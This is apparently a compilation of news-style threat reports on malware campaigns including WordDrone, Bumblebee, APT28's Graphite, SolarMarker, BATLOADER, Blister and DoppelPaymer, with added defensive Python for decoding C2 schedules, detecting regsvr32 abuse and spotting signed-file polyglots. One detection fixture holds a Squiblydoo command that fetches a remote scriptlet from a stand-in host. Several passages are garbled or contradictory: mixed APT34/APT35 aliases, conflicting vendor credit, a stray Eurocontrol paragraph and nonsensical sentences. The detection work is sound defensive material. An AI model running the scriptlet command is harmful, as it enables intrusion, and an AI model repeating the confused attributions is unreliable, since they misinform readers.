New Malware 'WordDrone' Targets Taiwan's Drone Industry

 



Acronis TRU has just published a comprehensive investigation revealing a highly sophisticated malware operation targeting Taiwan's growing drone industry. Dubbed "WordDrone," the malware abuses a version of Microsoft Word from the 1990s to install a persistent backdoor, the kind of threat that puts companies in Taiwan's drone industry in real jeopardy. At this stage, Taiwan's strategic military and technological position appears to be the rationale behind a breach designed to extract critical information, at a time when government investment in drone technology is accelerating.


How WordDrone Operates

The malware uses DLL side-loading against a vulnerable version of Microsoft Word 2010. The attackers place three files on the target system: a legitimate copy of the Microsoft Word executable (winword), a malicious DLL named wwlib.dll, and an additional encrypted file with a random name.

When the benign Word executable runs, it unknowingly loads the malicious DLL, which then decrypts and runs the real malware payload. The technique exploits a weakness in how older versions of Microsoft Word locate and load DLLs: the malicious DLL can masquerade as part of Microsoft Office. This makes WordDrone very hard for traditional security tools to detect and block, since the files involved look legitimate to most detection systems.


Detection Evasion Advanced Tactics

Moreover, many of the malicious DLL files are digitally signed, using recently expired certificates. Because many security systems rely on signatures to verify software, this disguise of legitimacy makes detection much more difficult and gives WordDrone an advantage in bypassing defences that trust signed binaries.

Once running, the threat performs a sequence of well-crafted operations. The payload begins with a shellcode stub that unpacks and injects an "install.dll" component, which establishes persistence on the affected system. install.dll keeps the malware present across reboots through several techniques: it can install the malware as a background service, schedule it as a recurring task, or directly inject the next stage of execution, which does not require permanent installation.


Persistence and Defense Evasion Techniques

It applies advanced techniques to stay unobserved and keep running. These begin with NTDLL unhooking: the malware reloads a fresh copy of the NTDLL library, discarding the hooks that monitoring software had placed, so that security tools cannot intercept its calls. It also keeps the EDR quiet: it scans for active security processes and creates blocking rules in Windows Firewall to cripple the identified security tools, effectively disabling detection capabilities that might otherwise raise defences against its presence.


Command-and-Control (C2) Communication for Remote Control

Another advanced feature of WordDrone is its ability to communicate with a C2 server, meaning the attackers can control the malware after it is installed. The communication schedule is hardcoded in the malware as a bit array that marks the active hours of the week. During those active hours the malware requests additional instructions or further malicious files from the C2 server.
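A weekly active-hours bit array of this kind is small enough to decode by hand, but an analyst hunting for the resulting beaconing wants it as readable windows. The following is an added example, not WordDrone code or Acronis tooling; the page does not give the real bit layout, so the layout here (168 bits, bit index = weekday*24 + hour, packed LSB-first into 21 bytes, weekday 0 = Monday) is an assumption.

```python
"""Decode a weekly active-hours bit array of the kind WordDrone is reported to
embed for its C2 schedule.  Constructed example: the real bit layout is not
published on this page, so the layout below is an assumption (168 bits, one per
hour of the week, bit index = weekday*24 + hour, packed LSB-first into 21 bytes,
weekday 0 = Monday)."""

DAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
HOURS_PER_WEEK = 7 * 24


def hour_is_active(schedule: bytes, weekday: int, hour: int) -> bool:
    """Return True if the (weekday, hour) slot is marked active in the array."""
    if len(schedule) * 8 < HOURS_PER_WEEK:
        raise ValueError("schedule must hold at least 168 bits")
    idx = weekday * 24 + hour
    return bool((schedule[idx // 8] >> (idx % 8)) & 1)


def build_schedule(windows) -> bytes:
    """Pack (weekday, start_hour, end_hour) windows into 21 bytes (end exclusive).
    Used here only to construct test data the way a sample might carry it."""
    bits = bytearray(21)
    for weekday, start, end in windows:
        for hour in range(start, end):
            idx = weekday * 24 + hour
            bits[idx // 8] |= 1 << (idx % 8)
    return bytes(bits)


def decode_schedule(schedule: bytes):
    """Turn the bit array into human-readable windows, merging consecutive
    active hours: [("Mon", 9, 17), ...] where the end hour is exclusive."""
    windows = []
    for weekday, name in enumerate(DAYS):
        start = None
        for hour in range(25):  # the 25th iteration closes a window open at 23:00
            active = hour < 24 and hour_is_active(schedule, weekday, hour)
            if active and start is None:
                start = hour
            elif not active and start is not None:
                windows.append((name, start, hour))
                start = None
    return windows


def active_hours_total(schedule: bytes) -> int:
    """Count active hours: a near-continuous beacon is a different hunting
    signal from a tight business-hours window."""
    return sum(bin(b).count("1") for b in schedule[:21])


if __name__ == "__main__":
    # Constructed sample: weekdays 09:00-18:00 plus Saturday 10:00-12:00.
    sample = build_schedule([(d, 9, 18) for d in range(5)] + [(5, 10, 12)])
    print(sample.hex())
    for day, start, end in decode_schedule(sample):
        print(f"{day} {start:02d}:00-{end:02d}:00")
    print("active hours per week:", active_hours_total(sample))
```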

WordDrone can communicate over several protocols, including TCP, TLS, HTTP, HTTPS, and WebSocket, all of which make identifying and analysing the malware's network activity more difficult. Its use of a custom binary format for this communication makes it even harder for cybersecurity teams to intercept or interpret its network traffic.


Possible Supply Chain Attack and Initial Infection Vector

The entry point of the WordDrone malware is not clear. Initial analysis, however, found the malicious files under the folder of a well-known Taiwanese ERP software product. This makes it likely that the attackers also compromised the ERP software as part of a supply chain attack, potentially exposing other organisations that use the software in other markets.

The WordDrone attack on the Taiwanese drone industry illustrates the vulnerabilities that sectors of strategic importance must contend with. Cybersecurity experts urge ongoing vigilance as defence and technology organisations try to stay ahead of such persistent threats.


Google Delivers Bumblebee Malware

 


A malware campaign has recently been detected that uses Google ads and SEO poisoning to spread malware. The malware, which targets corporate users, is dubbed Bumblebee. Bumblebee, aimed at enterprise users, is distributed through marketing channels such as Google Adwords and SEO poisoning that promote popular software applications such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. This malware is intended to replace the BazarLoader backdoor.

BazarLoader is a tool that helps attackers connect to networks and gain access to them. Several leading security organizations have stated that it is often the root cause of ransomware attacks.

Staying ahead of the new threats that emerge regularly in cybersecurity is a constant challenge. BumbleBee malware is used by ransomware gangs as a tool to gain initial access to networks and carry out attacks. Discovered in April 2022, it was an attempt by the Conti team to replace the BazarLoader backdoor, which has since been removed.

A dangerous new version of BumbleBee malware was recently discovered. As part of the attack chain, PowerSploit was used to reflectively inject DLLs into memory, a stealthy and dangerous technique. Because the malware is loaded directly into memory, existing antivirus products fail to detect it, which makes detection and prevention harder and allows the malware to stay undetected.

The malicious program often comes packaged as an ISO file containing a DLL with a custom loader inside it. The malware was dubbed BUMBLEBEE after its proprietary user agent, "Bumblebee." At the time of analysis by Google's Threat Analysis Group (TAG), BumbleBee was observed fetching Cobalt Strike payloads.

In an ongoing campaign found by Secureworks, researchers discovered trojanized versions of popular apps being distributed through Google ads to unsuspecting victims, who are infected with the BumbleBee malware. The advertisements promote Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. They redirect users to bogus download pages that prompt them to download a trojanized version of the software.

Google Ads Distribute Malware

The researchers also discovered that a Google advertisement campaign was being prepared for an upcoming campaign. It has become common practice to push trojanized versions of popular apps to unsuspecting victims through such advertisements in order to deliver malware loaders. This campaign consisted of a Google advertisement promoting a fake Cisco AnyConnect Secure Mobility Client download page.

The page was created on February 16, 2023, under the "appcisco[.]com" domain and hosted on that server. Through the malicious Google advertisement, the user was taken to the fake download page via a compromised WordPress site. The fake landing page promoted an MSI installer named "cisco-anyconnect-4_9_0195.msi" that installs the BumbleBee malware.

It is imperative to recognize the risks posed by such campaigns and take appropriate measures to secure the systems and networks they affect. To detect and prevent such attacks, companies must ensure robust security measures are in place. Users must remain vigilant and trained in cybersecurity best practices to protect themselves against these sophisticated attacks.

A cyberattack on Eurocontrol, the European air traffic control organization, did not end with the weekend; its effects continued until today. According to a report in the Wall Street Journal, the disruptions caused by Russia's KillNet networks did not disrupt flights.

FancyBear: Hackers Use PowerPoint Files to Deliver Malware

 

Cluster25 researchers have recently detected activity by the threat group APT28, also known as FancyBear, which is attributed to the Russian GRU (Main Intelligence Directorate of the Russian General Staff). The group has used a new code execution technique that relies on mouse movement in Microsoft PowerPoint to deliver Graphite malware.
 
According to the researchers, the campaign has been actively targeting organizations and individuals in the defense and government sectors of the European Union and Eastern European countries. The cyber espionage campaign is believed to be still active.
 

Methodology of Threat Actor

 
The threat actor allegedly entices victims with a PowerPoint file claiming to be associated with the Organisation for Economic Co-operation and Development (OECD).
 
This file contains two slides with instructions in English and French for accessing the translation feature in Zoom. It also includes a hyperlink that acts as the trigger for delivering a malicious PowerShell script, which downloads a JPEG image carrying an encrypted DLL file.
 
The resulting payload, the Graphite malware, is in Portable Executable (PE) form, which allows the malware operator to load other malware into system memory.
 
“The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive. The latter downloads a payload that extracts and injects in itself a new PE (Portable Executable) file, that the analysis showed to be a variant of a malware family known as Graphite, that uses the Microsoft Graph API and OneDrive for C&C communications,” states Cluster25 in its published analysis.
 
The Graphite malware is fileless, deployed in memory only, and is used by malware operators to deliver post-exploitation frameworks such as Empire. Its purpose is to let the attacker deploy other malware into system memory.
 
 
Based on the discovered metadata, Cluster25 concludes that the hackers prepared the campaign between January and February; however, the URLs used in the attacks were active in August and September.
 
With more hacker groups attempting to carry out such malicious cyber campaigns, the government and private sectors must deploy more powerful solutions to prevent future breaches and cyber attacks to safeguard their organizations.

Clipminer Botnet Made 1.7 Million Dollars From Crypto Mining

 

Threat researchers have found a large-scale Clipminer operation, a new cryptocurrency-mining malware that has netted its operators at least $1.7 million through transaction hijacking.

Clipminer is built on the KryptoCibule malware, according to researchers at Symantec, a Broadcom company. Both trojans are designed to steal bitcoin wallets, hijack transactions, and mine cryptocurrency on affected computers. 

Researchers were taken aback by the new malware because it had grown so quickly by the time it was discovered. According to the Symantec team, the operation involved 4375 bitcoin wallet addresses that received funds stolen from victims.

The malware is spread through downloads of pirated software: malicious Clipminer botnet files are distributed via torrent sites and other piracy channels. The miner can arrive on the machine as a WinRAR archive, which immediately starts the extraction process and launches the control panel file, leading to the download of the dynamic link library.

The DLL creates registry values and installs the malware as several files in the Windows directory. Those files are named after ransoms so that the profile may be hosted and the main miner payload can be downloaded and installed afterwards. The system's identification is sent to the C&C server, which then requests the payload. The malware is delivered as a 10MB file in the Program Files directory. Once the trojan has executed, scheduled tasks are set up to ensure the malware's persistence. A registry modification is also made to avoid re-infecting the same host.

According to Symantec, the first Clipminer samples began to circulate in January 2021, with malicious activity picking up in February. Since then, the malware has spread over P2P networks, torrent indexers, YouTube videos, and game and pirated-software cracks. To avoid infection by Clipminer or other malware, avoid downloading software from unknown sources, and verify the cryptocurrency wallet address you entered before initiating a transaction to protect yourself from a clipboard hijacker.

Iranian Hackers Launch Cyberattack Against US and the UK 

 

Secureworks, a cybersecurity firm, has detected a new attack attributed to the Iranian hacker organization known as APT34 or Oilrig, which utilized custom-crafted tools to target a Jordanian diplomat. APT35, Magic Hound, NewsBeef, Newscaster, Phosphorus, and TA453 are advanced persistent threat (APT) actors known for targeting activists, government organizations, journalists, and other entities. 

A ransomware gang with an Iranian operational connection has been linked to a succession of file-encrypting malware operations targeting institutions in Israel, the United States, Europe, and Australia.

"Elements of Cobalt Mirage activities have been reported as Phosphorus and TunnelVision," Secureworks, which tracks the cyberespionage group, said today. "The group appears to have switched to financially motivated attacks, including the deployment of ransomware." 

The threat actor used recently obtained access to breach the network of a nonprofit organization in the United States in January 2022, where they built a web shell which was then used to drop further files, according to the researchers. 

The threat actor has seemingly carried out two types of intrusion. One involves opportunistic ransomware attacks using genuine tools like BitLocker and DiskCryptor for financial gain. The second is more targeted, with the primary purpose of securing access and gathering intelligence, with some ransomware thrown in for good measure.

Initial access is gained by scanning internet-facing servers that are vulnerable to widely reported holes in Fortinet appliances and Microsoft Exchange Server, planting web shells on them, and using those as a route to move laterally and activate the ransomware.

The spear-phishing email, which Fortinet discovered, was sent to a Jordanian diplomat and pretended to be from a government colleague, with the sender address faked accordingly. The email included a malicious Excel attachment with VBA macro code that creates three files: a malicious binary, a configuration file, and a verified, clean DLL. The macro also adds a scheduled task that runs every four hours to give the malicious application (update.exe) persistence.

Another notable discovery concerns two anti-analysis methods used in the macro: manipulating sheet visibility in the spreadsheet and checking for the presence of a mouse, both of which may be absent on malware analysis sandbox services.

Secureworks detailed a January 2022 attack on an undisclosed US charity organization but said the exact means by which full volume encryption capability is triggered is unknown. In mid-March 2022, another attack aimed at a US local government network is thought to have used Log4Shell holes in the target's VMware Horizon architecture to perform reconnaissance and network scanning tasks. 

While the group has managed to breach a huge number of targets around the world, the security researchers believe that "their capacity to leverage on that access for financial gain or information collection is limited." Secureworks concludes that the group's use of publicly available tools for ransomware activities shows that it is still a threat.

Emotet is Evolving with Different Delivery Methods

 

Emotet is a well-known botnet and trojan that distributes follow-on malware on Windows platforms. After a 10-month pause following a coordinated law enforcement operation to take down its attack infrastructure, Emotet, the work of a cybercrime organization known as TA542 (also known as Mummy Spider or Gold Crestwood), marked its comeback late last year.

Since then, Emotet campaigns have sent tens of thousands of messages to thousands of clients across many geographic regions, with message volumes exceeding one million in some situations. The threat actor behind the popular Emotet botnet is experimenting with new attack methods on a small scale before incorporating them into larger-scale spam campaigns, possibly in response to Microsoft's decision to deactivate Visual Basic for Applications (VBA) macros by default across all of its products.

According to analysts, the malicious actors behind Emotet, TA542, are experimenting with new approaches on a micro level before deploying them on a larger scale. The current wave of attacks is claimed to have occurred between April 4 and April 19, 2022, when prior large-scale Emotet campaigns were halted. 

Researchers from Proofpoint discovered several distinguishing characteristics in the campaign, including the use of OneDrive URLs rather than Emotet's traditional reliance on Microsoft Office attachments or URLs linking to Office files. Instead of Emotet's previous Microsoft Excel or Word documents with VBA or XL4 macros, the campaign employed XLL files, a type of dynamic link library (DLL) designed to extend the capabilities of Excel.

Alternatively, these additional TTPs could mean that TA542 is now conducting more targeted, limited-scale attacks in addition to its traditional mass-scale email operations. The absence of macro-enabled Microsoft Excel or Word attachments is a notable departure from prior Emotet attacks, implying the threat actor is abandoning the tactic in response to Microsoft's plan to disable VBA macros by default beginning April 2022.

The development came after the malware's authors fixed a bug last week that had prevented potential victims from being compromised when they opened the weaponized email attachments.

The Wizard of Deception: Jupyter Infostealer

 

Researchers recently discovered a new variant of SolarMarker, a malware family that is mostly distributed through SEO manipulation to persuade people into downloading malicious documents. SolarMarker uses defense evasion techniques and extracts auto-fill data, saved passwords, and stored credit card information from victims' web browsers. It offers extra features that are unusual for infostealers, such as file transfer and command execution from a C2 server.

When it was first detected towards the end of 2020, Jupyter packaged itself with legitimate executables. When run, it revealed an obfuscated PowerShell script. The threat group keeps adding layers of stealth and obfuscation, such as loading the Jupyter Dynamic-Link Library (.DLL) into memory rather than writing the file to disk. It is now frequently packaged in massive Windows installer packages (.MSI) that can reach 100 MB in size.

To further conceal its intent, these packages are still bundled with legitimate software and signed with valid digital certificates. When launched, the installer loads and attempts to install the bundled genuine application. However, buried deep within the trojanized installer's code is a small, heavily obfuscated, encrypted PowerShell script that runs in the background.

Jupyter has masqueraded as a variety of programs and installers. The malware's main file extension has been changed to .MSI, and it executes its obfuscated PowerShell script through several techniques. Jupyter is usually hosted on phony download websites that pose as real ones. These websites typically offer a free PDF book and can be reached accidentally by a victim or via a link in a spam email.

It is often packaged with freeware and signed with unrevoked digital certificates, making the installation appear more authentic. When the Windows installer package is opened, it presents an installer pop-up for the targeted legitimate application while loading its data and running in the background.

Jupyter has deployed itself in a variety of ways in past campaigns. The malware usually consists of two primary files:
  • An executable and a Windows PowerShell script that contains the harmful code.
  • Some Jupyter variants have also dropped a temporary file (.TMP) into the victim's %AppData%\Roaming\Temp\ directory, from which the content of Jupyter's main malicious PowerShell script is constructed.

The malware uses PowerShell to conceal and execute its harmful code without ever writing itself to disk on the victim's PC. It avoids writing to disk by loading Jupyter's DLL into memory reflectively, whereas DLLs are normally loaded into a process from a file on disk.

Reflective DLL injection is a technique for loading code into a process directly from memory rather than from disk. Because the fully de-obfuscated malware never lives on disk, it requires a persistence mechanism, such as registry keys that reload the malware when the victim machine boots. As a result, the Jupyter DLL is difficult both to identify and to analyse.

Jupyter's core PowerShell can be broken down into six phases or components, each serving a particular objective, function, or capability. Although many Jupyter samples follow the same procedure, Jupyter's PowerShell code varies between samples, and some have been observed using slightly different methods to achieve the same goals.

With a modest tweak to the attacker's PowerShell script, the assembly can be saved to disk instead of being loaded into memory, which also helps in understanding how this version of SolarMarker operates. In the decompiled code, the names of the classes and functions are meaningless; they appear to be obfuscated.

The SolarMarker backdoor is a .NET C2 client that uses an encrypted channel to communicate with the C2 server. Communication is over HTTP, mostly via POST requests. The data is protected with RSA encryption and symmetric encryption using the Advanced Encryption Standard (AES). The client carries out internal reconnaissance, gathering basic information about the victim's system and exfiltrating it through the existing C2 channel. The infostealer module has a structure nearly identical to the backdoor module discussed above, but with more features.

By reading files relevant to the target browser, the SolarMarker infostealer module obtains login data, cookies, and web data (auto-fill) from web browsers. To decrypt the credentials, SolarMarker uses the API method CryptUnprotectData (DPAPI). 

In recent years the security industry has recognized the usefulness of behavior-based detection in reducing the dwell time of threats inside a network.

Hackers are Now Utilizing Office Documents to Launch the Regsvr32 Utility

 

Regsvr32, a Windows living-off-the-land binary (LOLBin) used to propagate trojans like Lokibot and Qbot, is seeing a surge in abuse recently, according to researchers. 

LOLBins are genuine, native utilities that are used routinely in a variety of computing environments, yet are also used by cybercriminals to avoid detection by blending in with normal activity. Regsvr32 is a Microsoft-signed Windows command-line program that lets users register and unregister DLLs (Dynamic Link Libraries). Information about a DLL file is written to the central registry so that Windows can use it.

This makes it simpler for other programs to take advantage of the DLLs' features. This broad reach is appealing to cybercriminals, who may abuse the utility through Squiblydoo, a technique used by known APT groups, for example in spear-phishing campaigns against Russian firms and, more recently, in certain crypto-mining incidents.

Unlawful use of Regsvr32 has been on the rise recently in Uptycs data, with cybercriminals attempting to register OCX files in particular. ActiveX controls are code blocks designed by Microsoft that allow applications to perform specified functions, such as showing a calendar, using OCX files.

Uptycs EDR employs a multi-layered detection strategy that not only analyzes threats using the Squiblydoo technique but also prioritizes them according to a specific composite score and severity. This helps analysts focus on key situations first, reducing alert fatigue. 

The majority of the Microsoft Excel files found in the attacks have the .XLSM or .XLSB extensions, which indicate that the files contain embedded macros. Using the formulas in the macros, the attackers typically download or run a malicious payload from a URL during the campaign.

Conventional security systems and security personnel tracking this activity for malicious behaviour face a problem because regsvr32 is frequently used for routine daily tasks. Security teams can monitor the following aspects:

  • The parent/child process relationship where regsvr32 is run with a Microsoft Word or Excel parent process.
  • regsvr32.exe executions that load scrobj.dll, which runs the COM scriptlet.
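The two monitoring points above can be expressed as simple rules over process-creation and image-load telemetry. The following is an added example, not Uptycs code: the record fields (image, parent_image, command_line, loaded_image) are an assumption modelled on Sysmon event IDs 1 and 7, and the sample records are constructed, including a benign vendor-installer case to show the false-positive risk the text mentions.

```python
"""Detection logic for the two regsvr32 monitoring points listed above, run over
constructed process-creation and image-load records.  Added example, not Uptycs
code; the record fields are an assumption modelled on Sysmon event IDs 1 and 7."""
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Squiblydoo-style use passes a remote scriptlet URL to the /i: switch.
URL_IN_CMDLINE = re.compile(r"/i:\s*https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def check_process_create(event: dict):
    """Rule 1: regsvr32 spawned by an Office parent (macro-driven LOLBin use),
    plus the remote-scriptlet command line.  Returns a list of alert strings."""
    alerts = []
    if basename(event.get("image", "")) != "regsvr32.exe":
        return alerts
    parent = basename(event.get("parent_image", ""))
    if parent in OFFICE_PARENTS:
        alerts.append(f"regsvr32 spawned by Office parent {parent}")
    cmd = event.get("command_line", "")
    if "scrobj.dll" in cmd.lower() and URL_IN_CMDLINE.search(cmd):
        alerts.append("regsvr32 registering remote scriptlet via scrobj.dll")
    return alerts


def check_image_load(event: dict):
    """Rule 2: regsvr32.exe loading scrobj.dll, the COM scriptlet host."""
    if basename(event.get("image", "")) != "regsvr32.exe":
        return []
    if basename(event.get("loaded_image", "")) == "scrobj.dll":
        return ["regsvr32 loaded scrobj.dll (COM scriptlet execution)"]
    return []


def scan(events):
    """Apply both rules to a stream of records; returns [(record_id, alert), ...]."""
    findings = []
    for ev in events:
        rule = check_process_create if ev["type"] == "process_create" else check_image_load
        for alert in rule(ev):
            findings.append((ev["id"], alert))
    return findings


# Constructed sample telemetry (not real logs).  Record 2 is the benign
# daily-task case the text warns about: a vendor installer registering its DLL.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process_create",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": r"regsvr32.exe /s C:\Users\Public\invoice.ocx"},
    {"id": 2, "type": "process_create",
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "parent_image": r"C:\Temp\vendor-setup.exe",
     "command_line": r"regsvr32 /s C:\Program Files\Vendor\vendor.dll"},
    {"id": 3, "type": "process_create",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"regsvr32 /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"id": 4, "type": "image_load",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "loaded_image": r"C:\Windows\System32\scrobj.dll"},
]

if __name__ == "__main__":
    for rec_id, alert in scan(SAMPLE_EVENTS):
        print(f"record {rec_id}: {alert}")
```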

BATLOADER and Atera Agent are Being Distributed Through an SEO Poisoning Campaign

 

A new SEO poisoning campaign is underway with the purpose of infecting targeted systems with the BATLOADER and Atera Agent malware. It appears to be aimed at professionals looking to download productivity applications such as TeamViewer, Zoom, or Visual Studio. SEO poisoning is a tactic attackers use to build malicious websites loaded with keywords that visitors typically look up in search engines, and then to use various SEO (Search Engine Optimization) techniques to make those sites appear prominently in search results.

According to a report by Mandiant researchers, in this malicious SEO campaign the threat actors compromise legitimate websites in order to plant malicious files or URLs. Users are thus routed to websites that host malware posing as well-known applications.

“The threat actor used “free productivity apps installation” or “free software development tools installation” themes as SEO keywords to lure victims to a compromised website and to download a malicious installer. The installer contains legitimate software bundled with the BATLOADER malware. The BATLOADER malware is dropped and executed during the software installation process.” said the researchers. 

“This initial BATLOADER compromise was the beginning of a multi-stage infection chain that provides the attackers with a foothold inside the target organization. Every stage was prepared for the next phase of the attack chain. And legitimate tools such as PowerShell, Msiexec.exe, and Mshta.exe allow proxy execution of malicious payloads to avoid detection,” they added. 

A file called "AppResolver.dll" was discovered in the attack chain as a significant sample. This DLL is an internal component of Microsoft's Windows operating system, but it contains malicious VBScript inserted in such a way that the code signature stays valid. When run on its own, the DLL does not execute the VBScript. When run with Mshta.exe, Mshta.exe locates and executes the VBScript without error.

This weakness is similar to CVE-2020-1599 in that the PE Authenticode signature remains valid after HTA-compatible scripts are appended to a file signed by any software developer. These PE+HTA polyglots (.hta files) can be used by Mshta.exe to circumvent security solutions that rely on Microsoft Windows code signing to decide whether files are trusted.

In this case, researchers discovered that arbitrary script data had been appended to the signature section of a legitimately signed Windows PE file, after the end of the ASN.1 structure. As long as the file extension is not ".hta", the resulting polyglot file retains a valid signature. If the polyglot file is executed with Mshta.exe, the script content runs successfully, since Mshta.exe skips the PE's bytes, locates the script at the end, and executes it.
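The polyglot condition is checkable from the PE itself: the signature section (IMAGE_DIRECTORY_ENTRY_SECURITY) starts with a WIN_CERTIFICATE header whose dwLength covers the PKCS#7 blob, and the DER SEQUENCE inside declares its own length, so any non-padding bytes between the two ends are appended data. The following is an added example, not Mandiant's tooling; it takes the raw bytes of the security directory (cut from the file using the data directory's offset and size, which is left to the reader's PE parser) and the sample blob is constructed rather than a real certificate.

```python
"""Check an Authenticode security directory for data appended after the PKCS#7
signature.  Added example, not Mandiant's tooling; the input is the raw
IMAGE_DIRECTORY_ENTRY_SECURITY bytes and the sample blob is constructed."""
import struct

WIN_CERT_HDR = struct.Struct("<IHH")  # dwLength, wRevision, wCertificateType
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002
HTA_MARKERS = (b"<script", b"<html", b"<hta:application")


def der_sequence_length(buf: bytes) -> int:
    """Total encoded size (tag + length + contents) of the DER SEQUENCE at buf[0]."""
    if not buf or buf[0] != 0x30:
        raise ValueError("security directory does not start with a DER SEQUENCE")
    first = buf[1]
    if first < 0x80:                      # short form: one length byte
        return 2 + first
    n = first & 0x7F                      # long form: n length bytes follow
    if n == 0 or n > 4 or len(buf) < 2 + n:
        raise ValueError("unsupported or truncated DER length")
    content = int.from_bytes(buf[2:2 + n], "big")
    return 2 + n + content


def inspect_security_directory(blob: bytes) -> dict:
    """Compare the declared WIN_CERTIFICATE length with the DER length and
    report what sits in between (trailer), flagging script-like text."""
    dw_length, _revision, cert_type = WIN_CERT_HDR.unpack_from(blob, 0)
    if cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA:
        raise ValueError(f"unexpected certificate type {cert_type:#x}")
    cert = blob[WIN_CERT_HDR.size:dw_length]
    der_len = der_sequence_length(cert)
    trailer = cert[der_len:]
    # Authenticode rounds dwLength up to 8 bytes, so a few zero bytes are normal.
    padding_only = len(trailer) < 8 and trailer == b"\x00" * len(trailer)
    lowered = trailer.lower()
    return {
        "declared_length": dw_length,
        "signature_length": der_len,
        "trailer_length": len(trailer),
        "padding_only": padding_only,
        "script_like": any(m in lowered for m in HTA_MARKERS),
        "trailer_preview": trailer[:40],
    }


def is_suspicious(report: dict) -> bool:
    """Anything beyond alignment padding after the signature is worth a look."""
    return report["trailer_length"] > 0 and not report["padding_only"]


def build_blob(trailer: bytes, content_len: int = 200) -> bytes:
    """Construct a WIN_CERTIFICATE wrapping a dummy DER SEQUENCE plus a trailer.
    Test-data helper only; the contents are not a real PKCS#7 structure."""
    content = (b"\x02\x01\x01" + b"\x05\x00" * content_len)[:content_len]
    der = b"\x30\x81" + bytes([content_len]) + content    # long-form 1-byte length
    body = der + trailer
    body += b"\x00" * (-len(body) % 8)                    # 8-byte alignment padding
    return WIN_CERT_HDR.pack(WIN_CERT_HDR.size + len(body), 0x0200,
                             WIN_CERT_TYPE_PKCS_SIGNED_DATA) + body


CLEAN_BLOB = build_blob(b"")
POLYGLOT_BLOB = build_blob(b'<html><script language="VBScript">\' constructed marker\n</script></html>')

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_BLOB), ("polyglot", POLYGLOT_BLOB)):
        r = inspect_security_directory(blob)
        print(f"{name}: suspicious={is_suspicious(r)} trailer={r['trailer_length']}B "
              f"script_like={r['script_like']} preview={r['trailer_preview']!r}")
```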

Blister Malware Silently Slips Through Windows Defences

 

Cybersecurity researchers have revealed details of an evasive malware campaign that uses valid code signing certificates to bypass security defences and remain undetected, with the purpose of distributing Cobalt Strike and BitRAT payloads on infected systems. Elastic Security researchers dubbed the binary, a loader, "Blister," and the malware samples had negligible to zero detections on VirusTotal. The infection vector utilized to stage the attack, as well as the eventual goals of the infiltration, are unknown. 

A notable aspect of the attacks is that they make use of a legitimate Sectigo code signing certificate. The malware has been seen signed with the certificate in question since September 15, 2021. Elastic stated that it has contacted the company in order to get the exploited certificates revoked. "Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigned executables," researchers Joe Desimone and Samir Bousseaden said. "Their use allows attackers to remain under the radar and evade detection for a longer period of time." 

Another intriguing component of this campaign is what looks to be a novel malware loader with few VirusTotal detections, known as the BLISTER loader. The loader is likely spliced into genuine libraries such as colorui.dll so that most of the on-disk footprint consists of known-good code and metadata. The loader can initially be written to disk by simple dropper executables. One such dropper saves a signed BLISTER loader to %temp%\Framwork\axsssig.dll and runs it with rundll32. LaunchColorCpl is a common DLL export and entry point name for BLISTER.

When run, BLISTER uses a basic 4-byte XOR routine to decode bootstrapping code stored in its resource section. The bootstrapping code is heavily obfuscated and initially sleeps for 10 minutes, almost certainly an attempt to evade sandbox analysis. After the delay it decrypts the embedded malware payload; researchers have identified CobaltStrike and BitRat as embedded payloads. Once decoded, the payload is either loaded into the current process or injected into a newly created WerFault.exe process.

Elastic Security has alerted Sectigo so that Blister's code signing certificate can be revoked; in the meantime, the company has also published a YARA rule to help organizations identify the new malware.

DoppelPaymer Searches for and Terminates Windows Processes

 

CrowdStrike Intelligence reported in a July 2019 blog post on DoppelPaymer that ProcessHacker was being hijacked to terminate a list of targeted processes and obtain access, delivering a "critical hit." DoppelPaymer is a descendant of the BitPaymer ransomware and a member of the Dridex malware family. It is currently delivered in a variety of ways, including phishing or spam emails with attachments containing malicious code, either JavaScript or VBScript.

DoppelPaymer places the ProcessHacker executable, the KProcessHacker driver, and the malicious stager DLL under a subdirectory of %APPDATA% in order to start ProcessHacker. The subdirectory name, as well as the executable and driver file names, are each a unique string of alphanumeric characters. Once the executable and driver have been written, one of the DLLs loaded by ProcessHacker is hijacked using a technique known as "DLL search order hijacking."

DoppelPaymer sends the ProcessHacker process two arguments: the name of the KProcessHacker.sys driver and an integer that will be used for inter-process communication (IPC) between the DoppelPaymer and ProcessHacker processes.

DoppelPaymer, like Dridex, abuses DLL search order hijacking to take advantage of the DLL loading behavior of Windows programs. When the operating system's PE loader loads a binary, it must also load the DLL files the PE needs in order to function. When searching for DLL files to load, Windows follows a fixed path by default: before checking the Windows system directories, it looks for the DLL in the same directory as the target program. A malicious process such as DoppelPaymer can therefore drop a malicious version of a DLL in that directory, and the target application will load it.

To decide which DLL to hijack, DoppelPaymer walks the module name list in the ProcessHacker binary's Import Address Table (IAT). Each name is hashed with the CRC32 algorithm and compared against a hardcoded list of hashes; if a match is found, the name is added to a list. A random number generator then selects one of the three names on the list.

After selecting a DLL, the authentic Windows version of the DLL is read into a memory buffer. This DLL serves as a template for creating the malicious stager DLL. The file is saved in the same folder as the ProcessHacker executable and has the same name as the hijacked DLL.
